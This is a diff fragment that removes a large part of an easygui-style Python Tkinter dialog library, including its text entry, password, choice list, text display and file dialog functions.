- global entryWidgets
- entryWidgets = []
-
- lastWidgetIndex = len(fields) - 1
-
- for widgetIndex in range(len(fields)):
- argFieldName = fields[widgetIndex]
- argFieldValue = values[widgetIndex]
- entryFrame = Frame(master=boxRoot)
- entryFrame.pack(side=TOP, fill=BOTH)
-
- # --------- entryWidget ----------------------------------------------
- labelWidget = Label(entryFrame, text=argFieldName)
- labelWidget.pack(side=LEFT)
-
- entryWidget = Entry(entryFrame, width=40,highlightthickness=2)
- entryWidgets.append(entryWidget)
- entryWidget.configure(font=(PROPORTIONAL_FONT_FAMILY,TEXT_ENTRY_FONT_SIZE))
- entryWidget.pack(side=RIGHT, padx="3m")
-
- bindArrows(entryWidget)
-
- entryWidget.bind("", __multenterboxGetText)
- entryWidget.bind("", __multenterboxCancel)
-
- # for the last entryWidget, if this is a multpasswordbox,
- # show the contents as just asterisks
- if widgetIndex == lastWidgetIndex:
- if mask:
- entryWidgets[widgetIndex].configure(show=mask)
-
- # put text into the entryWidget
- entryWidgets[widgetIndex].insert(0,argFieldValue)
- widgetIndex += 1
-
- # ------------------ ok button -------------------------------
- buttonsFrame = Frame(master=boxRoot)
- buttonsFrame.pack(side=BOTTOM, fill=BOTH)
-
- okButton = Button(buttonsFrame, takefocus=1, text="OK")
- bindArrows(okButton)
- okButton.pack(expand=1, side=LEFT, padx='3m', pady='3m', ipadx='2m', ipady='1m')
-
- # for the commandButton, bind activation events to the activation event handler
- commandButton = okButton
- handler = __multenterboxGetText
- for selectionEvent in STANDARD_SELECTION_EVENTS:
- commandButton.bind("<%s>" % selectionEvent, handler)
-
-
- # ------------------ cancel button -------------------------------
- cancelButton = Button(buttonsFrame, takefocus=1, text="Cancel")
- bindArrows(cancelButton)
- cancelButton.pack(expand=1, side=RIGHT, padx='3m', pady='3m', ipadx='2m', ipady='1m')
-
- # for the commandButton, bind activation events to the activation event handler
- commandButton = cancelButton
- handler = __multenterboxCancel
- for selectionEvent in STANDARD_SELECTION_EVENTS:
- commandButton.bind("<%s>" % selectionEvent, handler)
-
-
- # ------------------- time for action! -----------------
- entryWidgets[0].focus_force() # put the focus on the entryWidget
- boxRoot.mainloop() # run it!
-
- # -------- after the run has completed ----------------------------------
- boxRoot.destroy() # button_click didn't destroy boxRoot, so we do it now
- return __multenterboxText
-
-
-#-----------------------------------------------------------------------
-# __multenterboxGetText
-#-----------------------------------------------------------------------
-def __multenterboxGetText(event):
- global __multenterboxText
-
- __multenterboxText = []
- for entryWidget in entryWidgets:
- __multenterboxText.append(entryWidget.get())
- boxRoot.quit()
-
-
-def __multenterboxCancel(event):
- global __multenterboxText
- __multenterboxText = None
- boxRoot.quit()
-
-
-#-------------------------------------------------------------------
-# enterbox
-#-------------------------------------------------------------------
-def enterbox(msg="Enter something."
- , title=" "
- , default=""
- , strip=True
- , image=None
- , root=None
- ):
- """
- Show a box in which a user can enter some text.
-
- You may optionally specify some default text, which will appear in the
- enterbox when it is displayed.
-
- Returns the text that the user entered, or None if he cancels the operation.
-
- By default, enterbox strips its result (i.e. removes leading and trailing
- whitespace). (If you want it not to strip, use keyword argument: strip=False.)
- This makes it easier to test the results of the call::
-
- reply = enterbox(....)
- if reply:
- ...
- else:
- ...
- """
- result = __fillablebox(msg, title, default=default, mask=None,image=image,root=root)
- if result and strip:
- result = result.strip()
- return result
-
-
-def passwordbox(msg="Enter your password."
- , title=" "
- , default=""
- , image=None
- , root=None
- ):
- """
- Show a box in which a user can enter a password.
- The text is masked with asterisks, so the password is not displayed.
- Returns the text that the user entered, or None if he cancels the operation.
- """
- return __fillablebox(msg, title, default, mask="*",image=image,root=root)
-
-
-def __fillablebox(msg
- , title=""
- , default=""
- , mask=None
- , image=None
- , root=None
- ):
- """
- Show a box in which a user can enter some text.
- You may optionally specify some default text, which will appear in the
- enterbox when it is displayed.
- Returns the text that the user entered, or None if he cancels the operation.
- """
-
- global boxRoot, __enterboxText, __enterboxDefaultText
- global cancelButton, entryWidget, okButton
-
- if title == None: title == ""
- if default == None: default = ""
- __enterboxDefaultText = default
- __enterboxText = __enterboxDefaultText
-
- if root:
- root.withdraw()
- boxRoot = Toplevel(master=root)
- boxRoot.withdraw()
- else:
- boxRoot = Tk()
- boxRoot.withdraw()
-
- boxRoot.protocol('WM_DELETE_WINDOW', denyWindowManagerClose )
- boxRoot.title(title)
- boxRoot.iconname('Dialog')
- boxRoot.geometry(rootWindowPosition)
- boxRoot.bind("", __enterboxCancel)
-
- # ------------- define the messageFrame ---------------------------------
- messageFrame = Frame(master=boxRoot)
- messageFrame.pack(side=TOP, fill=BOTH)
-
- # ------------- define the imageFrame ---------------------------------
- tk_Image = None
- if image:
- imageFilename = os.path.normpath(image)
- junk,ext = os.path.splitext(imageFilename)
-
- if os.path.exists(imageFilename):
- if ext.lower() in [".gif", ".pgm", ".ppm"]:
- tk_Image = PhotoImage(master=boxRoot, file=imageFilename)
- else:
- if PILisLoaded:
- try:
- pil_Image = PILImage.open(imageFilename)
- tk_Image = PILImageTk.PhotoImage(pil_Image, master=boxRoot)
- except:
- msg += ImageErrorMsg % (imageFilename,
- "\nThe Python Imaging Library (PIL) could not convert this file to a displayable image."
- "\n\nPIL reports:\n" + exception_format())
-
- else: # PIL is not loaded
- msg += ImageErrorMsg % (imageFilename,
- "\nI could not import the Python Imaging Library (PIL) to display the image.\n\n"
- "You may need to install PIL\n"
- "(http://www.pythonware.com/products/pil/)\n"
- "to display " + ext + " image files.")
-
- else:
- msg += ImageErrorMsg % (imageFilename, "\nImage file not found.")
-
- if tk_Image:
- imageFrame = Frame(master=boxRoot)
- imageFrame.pack(side=TOP, fill=BOTH)
- label = Label(imageFrame,image=tk_Image)
- label.image = tk_Image # keep a reference!
- label.pack(side=TOP, expand=YES, fill=X, padx='1m', pady='1m')
-
- # ------------- define the buttonsFrame ---------------------------------
- buttonsFrame = Frame(master=boxRoot)
- buttonsFrame.pack(side=TOP, fill=BOTH)
-
-
- # ------------- define the entryFrame ---------------------------------
- entryFrame = Frame(master=boxRoot)
- entryFrame.pack(side=TOP, fill=BOTH)
-
- # ------------- define the buttonsFrame ---------------------------------
- buttonsFrame = Frame(master=boxRoot)
- buttonsFrame.pack(side=TOP, fill=BOTH)
-
- #-------------------- the msg widget ----------------------------
- messageWidget = Message(messageFrame, width="4.5i", text=msg)
- messageWidget.configure(font=(PROPORTIONAL_FONT_FAMILY,PROPORTIONAL_FONT_SIZE))
- messageWidget.pack(side=RIGHT, expand=1, fill=BOTH, padx='3m', pady='3m')
-
- # --------- entryWidget ----------------------------------------------
- entryWidget = Entry(entryFrame, width=40)
- bindArrows(entryWidget)
- entryWidget.configure(font=(PROPORTIONAL_FONT_FAMILY,TEXT_ENTRY_FONT_SIZE))
- if mask:
- entryWidget.configure(show=mask)
- entryWidget.pack(side=LEFT, padx="3m")
- entryWidget.bind("", __enterboxGetText)
- entryWidget.bind("", __enterboxCancel)
- # put text into the entryWidget
- entryWidget.insert(0,__enterboxDefaultText)
-
- # ------------------ ok button -------------------------------
- okButton = Button(buttonsFrame, takefocus=1, text="OK")
- bindArrows(okButton)
- okButton.pack(expand=1, side=LEFT, padx='3m', pady='3m', ipadx='2m', ipady='1m')
-
- # for the commandButton, bind activation events to the activation event handler
- commandButton = okButton
- handler = __enterboxGetText
- for selectionEvent in STANDARD_SELECTION_EVENTS:
- commandButton.bind("<%s>" % selectionEvent, handler)
-
-
- # ------------------ cancel button -------------------------------
- cancelButton = Button(buttonsFrame, takefocus=1, text="Cancel")
- bindArrows(cancelButton)
- cancelButton.pack(expand=1, side=RIGHT, padx='3m', pady='3m', ipadx='2m', ipady='1m')
-
- # for the commandButton, bind activation events to the activation event handler
- commandButton = cancelButton
- handler = __enterboxCancel
- for selectionEvent in STANDARD_SELECTION_EVENTS:
- commandButton.bind("<%s>" % selectionEvent, handler)
-
- # ------------------- time for action! -----------------
- entryWidget.focus_force() # put the focus on the entryWidget
- boxRoot.deiconify()
- boxRoot.mainloop() # run it!
-
- # -------- after the run has completed ----------------------------------
- if root: root.deiconify()
- boxRoot.destroy() # button_click didn't destroy boxRoot, so we do it now
- return __enterboxText
-
-
-def __enterboxGetText(event):
- global __enterboxText
-
- __enterboxText = entryWidget.get()
- boxRoot.quit()
-
-
-def __enterboxRestore(event):
- global entryWidget
-
- entryWidget.delete(0,len(entryWidget.get()))
- entryWidget.insert(0, __enterboxDefaultText)
-
-
-def __enterboxCancel(event):
- global __enterboxText
-
- __enterboxText = None
- boxRoot.quit()
-
-def denyWindowManagerClose():
- """ don't allow WindowManager close
- """
- x = Tk()
- x.withdraw()
- x.bell()
- x.destroy()
-
-
-
-#-------------------------------------------------------------------
-# multchoicebox
-#-------------------------------------------------------------------
-def multchoicebox(msg="Pick as many items as you like."
- , title=" "
- , choices=()
- , **kwargs
- ):
- """
- Present the user with a list of choices.
- allow him to select multiple items and return them in a list.
- if the user doesn't choose anything from the list, return the empty list.
- return None if he cancelled selection.
-
- @arg msg: the msg to be displayed.
- @arg title: the window title
- @arg choices: a list or tuple of the choices to be displayed
- """
- if len(choices) == 0: choices = ["Program logic error - no choices were specified."]
-
- global __choiceboxMultipleSelect
- __choiceboxMultipleSelect = 1
- return __choicebox(msg, title, choices)
-
-
-#-----------------------------------------------------------------------
-# choicebox
-#-----------------------------------------------------------------------
-def choicebox(msg="Pick something."
- , title=" "
- , choices=()
- ):
- """
- Present the user with a list of choices.
- return the choice that he selects.
- return None if he cancels the selection selection.
-
- @arg msg: the msg to be displayed.
- @arg title: the window title
- @arg choices: a list or tuple of the choices to be displayed
- """
- if len(choices) == 0: choices = ["Program logic error - no choices were specified."]
-
- global __choiceboxMultipleSelect
- __choiceboxMultipleSelect = 0
- return __choicebox(msg,title,choices)
-
-
-#-----------------------------------------------------------------------
-# __choicebox
-#-----------------------------------------------------------------------
-def __choicebox(msg
- , title
- , choices
- ):
- """
- internal routine to support choicebox() and multchoicebox()
- """
- global boxRoot, __choiceboxResults, choiceboxWidget, defaultText
- global choiceboxWidget, choiceboxChoices
- #-------------------------------------------------------------------
- # If choices is a tuple, we make it a list so we can sort it.
- # If choices is already a list, we make a new list, so that when
- # we sort the choices, we don't affect the list object that we
- # were given.
- #-------------------------------------------------------------------
- choices = list(choices[:])
- if len(choices) == 0:
- choices = ["Program logic error - no choices were specified."]
- defaultButtons = ["OK", "Cancel"]
-
- # make sure all choices are strings
- for index in range(len(choices)):
- choices[index] = str(choices[index])
-
- lines_to_show = min(len(choices), 20)
- lines_to_show = 20
-
- if title == None: title = ""
-
- # Initialize __choiceboxResults
- # This is the value that will be returned if the user clicks the close icon
- __choiceboxResults = None
-
- boxRoot = Tk()
- boxRoot.protocol('WM_DELETE_WINDOW', denyWindowManagerClose )
- screen_width = boxRoot.winfo_screenwidth()
- screen_height = boxRoot.winfo_screenheight()
- root_width = int((screen_width * 0.8))
- root_height = int((screen_height * 0.5))
- root_xpos = int((screen_width * 0.1))
- root_ypos = int((screen_height * 0.05))
-
- boxRoot.title(title)
- boxRoot.iconname('Dialog')
- rootWindowPosition = "+0+0"
- boxRoot.geometry(rootWindowPosition)
- boxRoot.expand=NO
- boxRoot.minsize(root_width, root_height)
- rootWindowPosition = "+" + str(root_xpos) + "+" + str(root_ypos)
- boxRoot.geometry(rootWindowPosition)
-
- # ---------------- put the frames in the window -----------------------------------------
- message_and_buttonsFrame = Frame(master=boxRoot)
- message_and_buttonsFrame.pack(side=TOP, fill=X, expand=NO)
-
- messageFrame = Frame(message_and_buttonsFrame)
- messageFrame.pack(side=LEFT, fill=X, expand=YES)
- #messageFrame.pack(side=TOP, fill=X, expand=YES)
-
- buttonsFrame = Frame(message_and_buttonsFrame)
- buttonsFrame.pack(side=RIGHT, expand=NO, pady=0)
- #buttonsFrame.pack(side=TOP, expand=YES, pady=0)
-
- choiceboxFrame = Frame(master=boxRoot)
- choiceboxFrame.pack(side=BOTTOM, fill=BOTH, expand=YES)
-
- # -------------------------- put the widgets in the frames ------------------------------
-
- # ---------- put a msg widget in the msg frame-------------------
- messageWidget = Message(messageFrame, anchor=NW, text=msg, width=int(root_width * 0.9))
- messageWidget.configure(font=(PROPORTIONAL_FONT_FAMILY,PROPORTIONAL_FONT_SIZE))
- messageWidget.pack(side=LEFT, expand=YES, fill=BOTH, padx='1m', pady='1m')
-
- # -------- put the choiceboxWidget in the choiceboxFrame ---------------------------
- choiceboxWidget = Listbox(choiceboxFrame
- , height=lines_to_show
- , borderwidth="1m"
- , relief="flat"
- , bg="white"
- )
-
- if __choiceboxMultipleSelect:
- choiceboxWidget.configure(selectmode=MULTIPLE)
-
- choiceboxWidget.configure(font=(PROPORTIONAL_FONT_FAMILY,PROPORTIONAL_FONT_SIZE))
-
- # add a vertical scrollbar to the frame
- rightScrollbar = Scrollbar(choiceboxFrame, orient=VERTICAL, command=choiceboxWidget.yview)
- choiceboxWidget.configure(yscrollcommand = rightScrollbar.set)
-
- # add a horizontal scrollbar to the frame
- bottomScrollbar = Scrollbar(choiceboxFrame, orient=HORIZONTAL, command=choiceboxWidget.xview)
- choiceboxWidget.configure(xscrollcommand = bottomScrollbar.set)
-
- # pack the Listbox and the scrollbars. Note that although we must define
- # the textArea first, we must pack it last, so that the bottomScrollbar will
- # be located properly.
-
- bottomScrollbar.pack(side=BOTTOM, fill = X)
- rightScrollbar.pack(side=RIGHT, fill = Y)
-
- choiceboxWidget.pack(side=LEFT, padx="1m", pady="1m", expand=YES, fill=BOTH)
-
- #---------------------------------------------------
- # sort the choices
- # eliminate duplicates
- # put the choices into the choiceboxWidget
- #---------------------------------------------------
- for index in range(len(choices)):
- choices[index] = str(choices[index])
-
- if runningPython3:
- choices.sort(key=str.lower)
- else:
- choices.sort( lambda x,y: cmp(x.lower(), y.lower())) # case-insensitive sort
-
- lastInserted = None
- choiceboxChoices = []
- for choice in choices:
- if choice == lastInserted: pass
- else:
- choiceboxWidget.insert(END, choice)
- choiceboxChoices.append(choice)
- lastInserted = choice
-
- boxRoot.bind('', KeyboardListener)
-
- # put the buttons in the buttonsFrame
- if len(choices) > 0:
- okButton = Button(buttonsFrame, takefocus=YES, text="OK", height=1, width=6)
- bindArrows(okButton)
- okButton.pack(expand=NO, side=TOP, padx='2m', pady='1m', ipady="1m", ipadx="2m")
-
- # for the commandButton, bind activation events to the activation event handler
- commandButton = okButton
- handler = __choiceboxGetChoice
- for selectionEvent in STANDARD_SELECTION_EVENTS:
- commandButton.bind("<%s>" % selectionEvent, handler)
-
- # now bind the keyboard events
- choiceboxWidget.bind("", __choiceboxGetChoice)
- choiceboxWidget.bind("", __choiceboxGetChoice)
- else:
- # now bind the keyboard events
- choiceboxWidget.bind("", __choiceboxCancel)
- choiceboxWidget.bind("", __choiceboxCancel)
-
- cancelButton = Button(buttonsFrame, takefocus=YES, text="Cancel", height=1, width=6)
- bindArrows(cancelButton)
- cancelButton.pack(expand=NO, side=BOTTOM, padx='2m', pady='1m', ipady="1m", ipadx="2m")
-
- # for the commandButton, bind activation events to the activation event handler
- commandButton = cancelButton
- handler = __choiceboxCancel
- for selectionEvent in STANDARD_SELECTION_EVENTS:
- commandButton.bind("<%s>" % selectionEvent, handler)
-
-
- # add special buttons for multiple select features
- if len(choices) > 0 and __choiceboxMultipleSelect:
- selectionButtonsFrame = Frame(messageFrame)
- selectionButtonsFrame.pack(side=RIGHT, fill=Y, expand=NO)
-
- selectAllButton = Button(selectionButtonsFrame, text="Select All", height=1, width=6)
- bindArrows(selectAllButton)
-
- selectAllButton.bind("",__choiceboxSelectAll)
- selectAllButton.pack(expand=NO, side=TOP, padx='2m', pady='1m', ipady="1m", ipadx="2m")
-
- clearAllButton = Button(selectionButtonsFrame, text="Clear All", height=1, width=6)
- bindArrows(clearAllButton)
- clearAllButton.bind("",__choiceboxClearAll)
- clearAllButton.pack(expand=NO, side=TOP, padx='2m', pady='1m', ipady="1m", ipadx="2m")
-
-
- # -------------------- bind some keyboard events ----------------------------
- boxRoot.bind("", __choiceboxCancel)
-
- # --------------------- the action begins -----------------------------------
- # put the focus on the choiceboxWidget, and the select highlight on the first item
- choiceboxWidget.select_set(0)
- choiceboxWidget.focus_force()
-
- # --- run it! -----
- boxRoot.mainloop()
-
- boxRoot.destroy()
- return __choiceboxResults
-
-
-def __choiceboxGetChoice(event):
- global boxRoot, __choiceboxResults, choiceboxWidget
-
- if __choiceboxMultipleSelect:
- __choiceboxResults = [choiceboxWidget.get(index) for index in choiceboxWidget.curselection()]
-
- else:
- choice_index = choiceboxWidget.curselection()
- __choiceboxResults = choiceboxWidget.get(choice_index)
-
- # writeln("Debugging> mouse-event=", event, " event.type=", event.type)
- # writeln("Debugging> choice=", choice_index, __choiceboxResults)
- boxRoot.quit()
-
-
-def __choiceboxSelectAll(event):
- global choiceboxWidget, choiceboxChoices
-
- choiceboxWidget.selection_set(0, len(choiceboxChoices)-1)
-
-def __choiceboxClearAll(event):
- global choiceboxWidget, choiceboxChoices
-
- choiceboxWidget.selection_clear(0, len(choiceboxChoices)-1)
-
-
-
-def __choiceboxCancel(event):
- global boxRoot, __choiceboxResults
-
- __choiceboxResults = None
- boxRoot.quit()
-
-
-def KeyboardListener(event):
- global choiceboxChoices, choiceboxWidget
- key = event.keysym
- if len(key) <= 1:
- if key in string.printable:
- # Find the key in the list.
- # before we clear the list, remember the selected member
- try:
- start_n = int(choiceboxWidget.curselection()[0])
- except IndexError:
- start_n = -1
-
- ## clear the selection.
- choiceboxWidget.selection_clear(0, 'end')
-
- ## start from previous selection +1
- for n in range(start_n+1, len(choiceboxChoices)):
- item = choiceboxChoices[n]
- if item[0].lower() == key.lower():
- choiceboxWidget.selection_set(first=n)
- choiceboxWidget.see(n)
- return
- else:
- # has not found it so loop from top
- for n in range(len(choiceboxChoices)):
- item = choiceboxChoices[n]
- if item[0].lower() == key.lower():
- choiceboxWidget.selection_set(first = n)
- choiceboxWidget.see(n)
- return
-
- # nothing matched -- we'll look for the next logical choice
- for n in range(len(choiceboxChoices)):
- item = choiceboxChoices[n]
- if item[0].lower() > key.lower():
- if n > 0:
- choiceboxWidget.selection_set(first = (n-1))
- else:
- choiceboxWidget.selection_set(first = 0)
- choiceboxWidget.see(n)
- return
-
- # still no match (nothing was greater than the key)
- # we set the selection to the first item in the list
- lastIndex = len(choiceboxChoices)-1
- choiceboxWidget.selection_set(first = lastIndex)
- choiceboxWidget.see(lastIndex)
- return
-
-#-----------------------------------------------------------------------
-# exception_format
-#-----------------------------------------------------------------------
-def exception_format():
- """
- Convert exception info into a string suitable for display.
- """
- return "".join(traceback.format_exception(
- sys.exc_info()[0]
- , sys.exc_info()[1]
- , sys.exc_info()[2]
- ))
-
-#-----------------------------------------------------------------------
-# exceptionbox
-#-----------------------------------------------------------------------
-def exceptionbox(msg=None, title=None):
- """
- Display a box that gives information about
- an exception that has just been raised.
-
- The caller may optionally pass in a title for the window, or a
- msg to accompany the error information.
-
- Note that you do not need to (and cannot) pass an exception object
- as an argument. The latest exception will automatically be used.
- """
- if title == None: title = "Error Report"
- if msg == None:
- msg = "An error (exception) has occurred in the program."
-
- codebox(msg, title, exception_format())
-
-#-------------------------------------------------------------------
-# codebox
-#-------------------------------------------------------------------
-
-def codebox(msg=""
- , title=" "
- , text=""
- ):
- """
- Display some text in a monospaced font, with no line wrapping.
- This function is suitable for displaying code and text that is
- formatted using spaces.
-
- The text parameter should be a string, or a list or tuple of lines to be
- displayed in the textbox.
- """
- return textbox(msg, title, text, codebox=1 )
-
-#-------------------------------------------------------------------
-# textbox
-#-------------------------------------------------------------------
-def textbox(msg=""
- , title=" "
- , text=""
- , codebox=0
- ):
- """
- Display some text in a proportional font with line wrapping at word breaks.
- This function is suitable for displaying general written text.
-
- The text parameter should be a string, or a list or tuple of lines to be
- displayed in the textbox.
- """
-
- if msg == None: msg = ""
- if title == None: title = ""
-
- global boxRoot, __replyButtonText, __widgetTexts, buttonsFrame
- global rootWindowPosition
- choices = ["OK"]
- __replyButtonText = choices[0]
-
-
- boxRoot = Tk()
-
- boxRoot.protocol('WM_DELETE_WINDOW', denyWindowManagerClose )
-
- screen_width = boxRoot.winfo_screenwidth()
- screen_height = boxRoot.winfo_screenheight()
- root_width = int((screen_width * 0.8))
- root_height = int((screen_height * 0.5))
- root_xpos = int((screen_width * 0.1))
- root_ypos = int((screen_height * 0.05))
-
- boxRoot.title(title)
- boxRoot.iconname('Dialog')
- rootWindowPosition = "+0+0"
- boxRoot.geometry(rootWindowPosition)
- boxRoot.expand=NO
- boxRoot.minsize(root_width, root_height)
- rootWindowPosition = "+" + str(root_xpos) + "+" + str(root_ypos)
- boxRoot.geometry(rootWindowPosition)
-
- mainframe = Frame(master=boxRoot)
- mainframe.pack(side=TOP, fill=BOTH, expand=YES)
-
- # ---- put frames in the window -----------------------------------
- # we pack the textboxFrame first, so it will expand first
- textboxFrame = Frame(mainframe, borderwidth=3)
- textboxFrame.pack(side=BOTTOM , fill=BOTH, expand=YES)
-
- message_and_buttonsFrame = Frame(mainframe)
- message_and_buttonsFrame.pack(side=TOP, fill=X, expand=NO)
-
- messageFrame = Frame(message_and_buttonsFrame)
- messageFrame.pack(side=LEFT, fill=X, expand=YES)
-
- buttonsFrame = Frame(message_and_buttonsFrame)
- buttonsFrame.pack(side=RIGHT, expand=NO)
-
- # -------------------- put widgets in the frames --------------------
-
- # put a textArea in the top frame
- if codebox:
- character_width = int((root_width * 0.6) / MONOSPACE_FONT_SIZE)
- textArea = Text(textboxFrame,height=25,width=character_width, padx="2m", pady="1m")
- textArea.configure(wrap=NONE)
- textArea.configure(font=(MONOSPACE_FONT_FAMILY, MONOSPACE_FONT_SIZE))
-
- else:
- character_width = int((root_width * 0.6) / MONOSPACE_FONT_SIZE)
- textArea = Text(
- textboxFrame
- , height=25
- , width=character_width
- , padx="2m"
- , pady="1m"
- )
- textArea.configure(wrap=WORD)
- textArea.configure(font=(PROPORTIONAL_FONT_FAMILY,PROPORTIONAL_FONT_SIZE))
-
-
- # some simple keybindings for scrolling
- mainframe.bind("" , textArea.yview_scroll( 1,PAGES))
- mainframe.bind("", textArea.yview_scroll(-1,PAGES))
-
- mainframe.bind("", textArea.xview_scroll( 1,PAGES))
- mainframe.bind("" , textArea.xview_scroll(-1,PAGES))
-
- mainframe.bind("", textArea.yview_scroll( 1,UNITS))
- mainframe.bind("" , textArea.yview_scroll(-1,UNITS))
-
-
- # add a vertical scrollbar to the frame
- rightScrollbar = Scrollbar(textboxFrame, orient=VERTICAL, command=textArea.yview)
- textArea.configure(yscrollcommand = rightScrollbar.set)
-
- # add a horizontal scrollbar to the frame
- bottomScrollbar = Scrollbar(textboxFrame, orient=HORIZONTAL, command=textArea.xview)
- textArea.configure(xscrollcommand = bottomScrollbar.set)
-
- # pack the textArea and the scrollbars. Note that although we must define
- # the textArea first, we must pack it last, so that the bottomScrollbar will
- # be located properly.
-
- # Note that we need a bottom scrollbar only for code.
- # Text will be displayed with wordwrap, so we don't need to have a horizontal
- # scroll for it.
- if codebox:
- bottomScrollbar.pack(side=BOTTOM, fill=X)
- rightScrollbar.pack(side=RIGHT, fill=Y)
-
- textArea.pack(side=LEFT, fill=BOTH, expand=YES)
-
-
- # ---------- put a msg widget in the msg frame-------------------
- messageWidget = Message(messageFrame, anchor=NW, text=msg, width=int(root_width * 0.9))
- messageWidget.configure(font=(PROPORTIONAL_FONT_FAMILY,PROPORTIONAL_FONT_SIZE))
- messageWidget.pack(side=LEFT, expand=YES, fill=BOTH, padx='1m', pady='1m')
-
- # put the buttons in the buttonsFrame
- okButton = Button(buttonsFrame, takefocus=YES, text="OK", height=1, width=6)
- okButton.pack(expand=NO, side=TOP, padx='2m', pady='1m', ipady="1m", ipadx="2m")
-
- # for the commandButton, bind activation events to the activation event handler
- commandButton = okButton
- handler = __textboxOK
- for selectionEvent in ["Return","Button-1","Escape"]:
- commandButton.bind("<%s>" % selectionEvent, handler)
-
-
- # ----------------- the action begins ----------------------------------------
- try:
- # load the text into the textArea
- if type(text) == type("abc"): pass
- else:
- try:
- text = "".join(text) # convert a list or a tuple to a string
- except:
- msgbox("Exception when trying to convert "+ str(type(text)) + " to text in textArea")
- sys.exit(16)
- textArea.insert(END,text, "normal")
-
- except:
- msgbox("Exception when trying to load the textArea.")
- sys.exit(16)
-
- try:
- okButton.focus_force()
- except:
- msgbox("Exception when trying to put focus on okButton.")
- sys.exit(16)
-
- boxRoot.mainloop()
-
- # this line MUST go before the line that destroys boxRoot
- areaText = textArea.get(0.0,END)
- boxRoot.destroy()
- return areaText # return __replyButtonText
-
-#-------------------------------------------------------------------
-# __textboxOK
-#-------------------------------------------------------------------
-def __textboxOK(event):
- global boxRoot
- boxRoot.quit()
-
-
-
-#-------------------------------------------------------------------
-# diropenbox
-#-------------------------------------------------------------------
-def diropenbox(msg=None
- , title=None
- , default=None
- ):
- """
- A dialog to get a directory name.
- Note that the msg argument, if specified, is ignored.
-
- Returns the name of a directory, or None if user chose to cancel.
-
- If the "default" argument specifies a directory name, and that
- directory exists, then the dialog box will start with that directory.
- """
- title=getFileDialogTitle(msg,title)
- localRoot = Tk()
- localRoot.withdraw()
- if not default: default = None
- f = tk_FileDialog.askdirectory(
- parent=localRoot
- , title=title
- , initialdir=default
- , initialfile=None
- )
- localRoot.destroy()
- if not f: return None
- return os.path.normpath(f)
-
-
-
-#-------------------------------------------------------------------
-# getFileDialogTitle
-#-------------------------------------------------------------------
-def getFileDialogTitle(msg
- , title
- ):
- if msg and title: return "%s - %s" % (title,msg)
- if msg and not title: return str(msg)
- if title and not msg: return str(title)
- return None # no message and no title
-
-#-------------------------------------------------------------------
-# class FileTypeObject for use with fileopenbox
-#-------------------------------------------------------------------
-class FileTypeObject:
- def __init__(self,filemask):
- if len(filemask) == 0:
- raise AssertionError('Filetype argument is empty.')
-
- self.masks = []
-
- if type(filemask) == type("abc"): # a string
- self.initializeFromString(filemask)
-
- elif type(filemask) == type([]): # a list
- if len(filemask) < 2:
- raise AssertionError('Invalid filemask.\n'
- +'List contains less than 2 members: "%s"' % filemask)
- else:
- self.name = filemask[-1]
- self.masks = list(filemask[:-1] )
- else:
- raise AssertionError('Invalid filemask: "%s"' % filemask)
-
- def __eq__(self,other):
- if self.name == other.name: return True
- return False
-
- def add(self,other):
- for mask in other.masks:
- if mask in self.masks: pass
- else: self.masks.append(mask)
-
- def toTuple(self):
- return (self.name,tuple(self.masks))
-
- def isAll(self):
- if self.name == "All files": return True
- return False
-
- def initializeFromString(self, filemask):
- # remove everything except the extension from the filemask
- self.ext = os.path.splitext(filemask)[1]
- if self.ext == "" : self.ext = ".*"
- if self.ext == ".": self.ext = ".*"
- self.name = self.getName()
- self.masks = ["*" + self.ext]
-
- def getName(self):
- e = self.ext
- if e == ".*" : return "All files"
- if e == ".txt": return "Text files"
- if e == ".py" : return "Python files"
- if e == ".pyc" : return "Python files"
- if e == ".xls": return "Excel files"
- if e.startswith("."):
- return e[1:].upper() + " files"
- return e.upper() + " files"
-
-
-#-------------------------------------------------------------------
-# fileopenbox
-#-------------------------------------------------------------------
-def fileopenbox(msg=None
- , title=None
- , default="*"
- , filetypes=None
- ):
- """
- A dialog to get a file name.
-
- About the "default" argument
- ============================
- The "default" argument specifies a filepath that (normally)
- contains one or more wildcards.
- fileopenbox will display only files that match the default filepath.
- If omitted, defaults to "*" (all files in the current directory).
-
- WINDOWS EXAMPLE::
- ...default="c:/myjunk/*.py"
- will open in directory c:\myjunk\ and show all Python files.
-
- WINDOWS EXAMPLE::
- ...default="c:/myjunk/test*.py"
- will open in directory c:\myjunk\ and show all Python files
- whose names begin with "test".
-
-
- Note that on Windows, fileopenbox automatically changes the path
- separator to the Windows path separator (backslash).
-
- About the "filetypes" argument
- ==============================
- If specified, it should contain a list of items,
- where each item is either::
- - a string containing a filemask # e.g. "*.txt"
- - a list of strings, where all of the strings except the last one
- are filemasks (each beginning with "*.",
- such as "*.txt" for text files, "*.py" for Python files, etc.).
- and the last string contains a filetype description
-
- EXAMPLE::
- filetypes = ["*.css", ["*.htm", "*.html", "HTML files"] ]
-
- NOTE THAT
- =========
-
- If the filetypes list does not contain ("All files","*"),
- it will be added.
-
- If the filetypes list does not contain a filemask that includes
- the extension of the "default" argument, it will be added.
- For example, if default="*abc.py"
- and no filetypes argument was specified, then
- "*.py" will automatically be added to the filetypes argument.
-
- @rtype: string or None
- @return: the name of a file, or None if user chose to cancel
-
- @arg msg: the msg to be displayed.
- @arg title: the window title
- @arg default: filepath with wildcards
- @arg filetypes: filemasks that a user can choose, e.g. "*.txt"
- """
- localRoot = Tk()
- localRoot.withdraw()
-
- initialbase, initialfile, initialdir, filetypes = fileboxSetup(default,filetypes)
-
- #------------------------------------------------------------
- # if initialfile contains no wildcards; we don't want an
- # initial file. It won't be used anyway.
- # Also: if initialbase is simply "*", we don't want an
- # initialfile; it is not doing any useful work.
- #------------------------------------------------------------
- if (initialfile.find("*") < 0) and (initialfile.find("?") < 0):
- initialfile = None
- elif initialbase == "*":
- initialfile = None
-
- f = tk_FileDialog.askopenfilename(parent=localRoot
- , title=getFileDialogTitle(msg,title)
- , initialdir=initialdir
- , initialfile=initialfile
- , filetypes=filetypes
- )
-
- localRoot.destroy()
-
- if not f: return None
- return os.path.normpath(f)
-
-
-#-------------------------------------------------------------------
-# filesavebox
-#-------------------------------------------------------------------
-def filesavebox(msg=None
- , title=None
- , default=""
- , filetypes=None
- ):
- """
- A file to get the name of a file to save.
- Returns the name of a file, or None if user chose to cancel.
-
- The "default" argument should contain a filename (i.e. the
- current name of the file to be saved). It may also be empty,
- or contain a filemask that includes wildcards.
-
- The "filetypes" argument works like the "filetypes" argument to
- fileopenbox.
- """
-
- localRoot = Tk()
- localRoot.withdraw()
-
